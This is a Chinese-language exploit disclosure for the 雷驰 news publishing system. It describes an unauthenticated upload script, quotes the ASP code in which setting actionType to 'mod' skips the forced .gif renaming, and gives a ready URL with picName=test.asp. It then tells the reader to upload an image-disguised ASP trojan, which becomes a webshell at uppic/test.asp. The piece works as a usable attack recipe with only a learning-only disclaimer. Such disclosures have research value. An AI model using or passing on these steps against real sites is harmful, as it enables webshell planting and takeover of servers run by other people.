声明：漏洞为focn[BCT]首先发现

版权归漏洞发现者focn所有，转载请保持文章完整，并注明出处！
本文章只做学习研究用，任何人用于其他非法用途本人不承担任何责任！

作者：黑萝卜
系统： 雷驰新闻发布管理系统
版本： 当前任何版本
漏洞描述：1 在admin文件夹下的uploadPic.inc.asp中，没有对访问权限进行限制，任意用户都可
                以 访问到此文件。任意用户都可以使用此文件上传文件到服务器
              2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码！

          if file.FileSize>0 then       ''如果 FileSize > 0 说明有文件数据
            '生成图片名字
            if actionType= "mod" then
              remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
            else
              if editRemNum<>"" then                
                remNum = editRemNum
              else
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
              end if
              remFileName = remNum&"_"&(editImageNum+1)&".gif"
            end if
           
            file.SaveAs Server.mappath(formPath&remFileName)   ''保存文件
             
%>

关键的是 if actionType= "mod" then
              remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件
构造如下UPL
http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
然后在上传文件里面填要传的图片格式的ASP木马
就可以在uppic目录下上传文件名为test.asp的文件
uppic/test.asp